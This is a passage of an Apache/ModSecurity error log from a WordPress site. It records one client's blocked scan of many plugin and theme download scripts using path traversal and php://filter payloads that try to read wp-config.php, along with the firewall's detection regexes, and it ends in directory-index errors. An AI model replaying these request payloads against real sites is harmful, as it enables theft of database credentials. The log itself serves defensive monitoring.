"(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/thecartpress/modules/Miranda.class.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php%00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/thecartpress/modules/Miranda.class.php"] [unique_id "Y0ZyZOLrJ0tgpRmNRAaIdAAAAMY"] [Wed Oct 12 02:53:08.948035 2022] [:error] [pid 22337:tid 140534391719680] [client 185.189.115.30:51038] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-custom-pages/wp-download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "Y0ZyZKBKlkjFPqrcdjM4AwAAABA"] [Wed Oct 12 02:53:09.106781 2022] [:error] [pid 22337:tid 140534324578048] [client 185.189.115.30:51040] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/ebook-downloader/ebook_plugin.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ebook-downloader/ebook_plugin.php"] [unique_id "Y0ZyZaBKlkjFPqrcdjM4BAAAABg"] [Wed Oct 12 02:53:09.259760 2022] [:error] [pid 22337:tid 140534332970752] [client 185.189.115.30:51042] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/download-shortcode/inc/force-download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/download-shortcode/inc/force-download.php"] [unique_id "Y0ZyZaBKlkjFPqrcdjM4BQAAABc"] [Wed Oct 12 02:53:09.411806 2022] [:error] [pid 22338:tid 140534391719680] [client 185.189.115.30:51044] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/MichaelCanthony/download.php?file=php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3D..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/MichaelCanthony/download.php"] [unique_id "Y0ZyZWINFIoIk7hPzpaZggAAAFA"] [Wed Oct 12 02:53:11.500753 2022] [:error] [pid 22339:tid 140534475646720] [client 185.189.115.30:51050] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/kap/download.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/kap/download.php"] [unique_id "Y0ZyZ9mZws0mEkXxGo-V0AAAAIY"] [Wed Oct 12 02:53:11.652139 2022] [:error] [pid 22972:tid 140534467254016] [client 185.189.115.30:51054] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/oxygen-theme/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/oxygen-theme/download.php"] [unique_id "Y0ZyZ-LrJ0tgpRmNRAaIdgAAAMc"] [Wed Oct 12 02:53:11.843945 2022] [:error] [pid 22337:tid 140534366541568] [client 185.189.115.30:51056] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/rowe/download/download.php?download_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/rowe/download/download.php"] [unique_id "Y0ZyZ6BKlkjFPqrcdjM4BgAAABM"] [Wed Oct 12 02:53:13.664635 2022] [:error] [pid 22972:tid 140534391719680] [client 185.189.115.30:51064] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-e-commerce/wpsc-includes/misc.functions.php?image_name=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-e-commerce/wpsc-includes/misc.functions.php"] [unique_id "Y0ZyaeLrJ0tgpRmNRAaIeAAAANA"] [Wed Oct 12 02:53:20.614206 2022] [:error] [pid 22338:tid 140534366541568] [client 185.189.115.30:51084] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:img. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "136"] [id "950911"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: http/1.0 found within ARGS:img: ../wp-config.php?http/1.0?action=revslider_show_image"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y0ZycGINFIoIk7hPzpaZigAAAFM"] [Wed Oct 12 02:53:24.036360 2022] [:error] [pid 22972:tid 140534400112384] [client 185.189.115.30:51094] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/adaptive-images/adaptive-images-script.php"] [unique_id "Y0ZydOLrJ0tgpRmNRAaIfAAAAM8"] [Wed Oct 12 02:53:25.082490 2022] [:error] [pid 22972:tid 140534332970752] [client 185.189.115.30:51100] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=getfile&/../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y0ZydeLrJ0tgpRmNRAaIfQAAANc"] [Wed Oct 12 02:53:25.234854 2022] [:error] [pid 22337:tid 140534458861312] [client 185.189.115.30:51102] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp\\xe2\\x80\\x94admin/admin\\xe2\\x80\\x94ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp\\xe2\\x80\\x94admin/admin\\xe2\\x80\\x94ajax.php"] [unique_id "Y0ZydaBKlkjFPqrcdjM4CgAAAAg"] [Wed Oct 12 02:53:25.388610 2022] [:error] [pid 22337:tid 140534442075904] [client 185.189.115.30:51104] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/tess/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/tess/download.php"] [unique_id "Y0ZydaBKlkjFPqrcdjM4CwAAAAo"] [Wed Oct 12 02:53:25.539880 2022] [:error] [pid 22337:tid 140534484039424] [client 185.189.115.30:51106] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/jarida/download.php?uri=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/jarida/download.php"] [unique_id "Y0ZydaBKlkjFPqrcdjM4DAAAAAU"] [Wed Oct 12 02:53:25.705222 2022] [:error] [pid 22337:tid 140534349756160] [client 185.189.115.30:51108] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/corporate_works/downloader.php?file_download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/corporate_works/downloader.php"] [unique_id "Y0ZydaBKlkjFPqrcdjM4DQAAABU"] [Wed Oct 12 02:53:25.858412 2022] [:error] [pid 22972:tid 140534580840192] [client 185.189.115.30:51110] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/Newspapertimes_1/download.php?filename=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/Newspapertimes_1/download.php"] [unique_id "Y0ZydeLrJ0tgpRmNRAaIfgAAAMI"] [Wed Oct 12 02:53:26.027050 2022] [:error] [pid 22972:tid 140534366541568] [client 185.189.115.30:51112] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/membership-simplified-for-oap-members-only/download.php"] [unique_id "Y0ZyduLrJ0tgpRmNRAaIfwAAANM"] [Wed Oct 12 04:30:30.528995 2022] [autoindex:error] [pid 724:tid 139695165609728] [client 34.247.208.201:53984] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/social-link/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Wed Oct 12 04:31:39.516921 2022] [autoindex:error] [pid 722:tid 139695019226880] [client 151.80.67.229:54048] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/dist/vendor/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Wed Oct 12 04:31:49.921976 2022] [autoindex:error] [pid 1455:tid 139694960477952] [client 34.247.208.201:54054] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/categories/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Wed Oct 12 04:32:19.123859 2022] [autoindex:error] [pid 724:tid 139695027619584] [client 31.186.170.43:54074] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/verse/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Wed Oct 12 04:34:11.055908 2022] [autoindex:error] [pid 723:tid 139694960477952] [client 151.80.67.229:54154] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/dist/development/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Wed Oct 12 04:34:37.282785 2022] [autoindex:error] [pid 1455:tid 139695077975808] [client 198.57.224.71:54178] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/block-library/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Wed Oct 12 04:34:41.696693 2022] [autoindex:error] [pid 724:tid 139695052797696] [client 31.186.170.43:54186] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/plugins/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Wed Oct 12 04:34:53.588980 2022] [autoindex:error] [pid 724:tid 139695207573248] [client 198.57.224.71:54198] AH01276: Cannot serve directory /home/investig/public_html/wp-content/themes/twentynineteen/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Wed Oct 12 04:35:30.725296 2022] [autoindex:error] [pid 1455:tid 139695207573248] [client 34.247.208.201:54224] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/endpoints/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Wed Oct 12 04:35:40.354748 2022] [autoindex:error] [pid 1455:tid 139695002441472] [client 198.57.224.71:54228] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/block-editor/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Wed Oct 12 04:36:09.600487 2022] [autoindex:error] [pid 1455:tid 139694985656064] [client 34.247.208.201:54250] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/smilies/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Wed Oct 12 04:36:46.826346 2022] [autoindex:error] [pid 722:tid 139695061190400] [client 34.247.208.201:54274] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Cache/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: 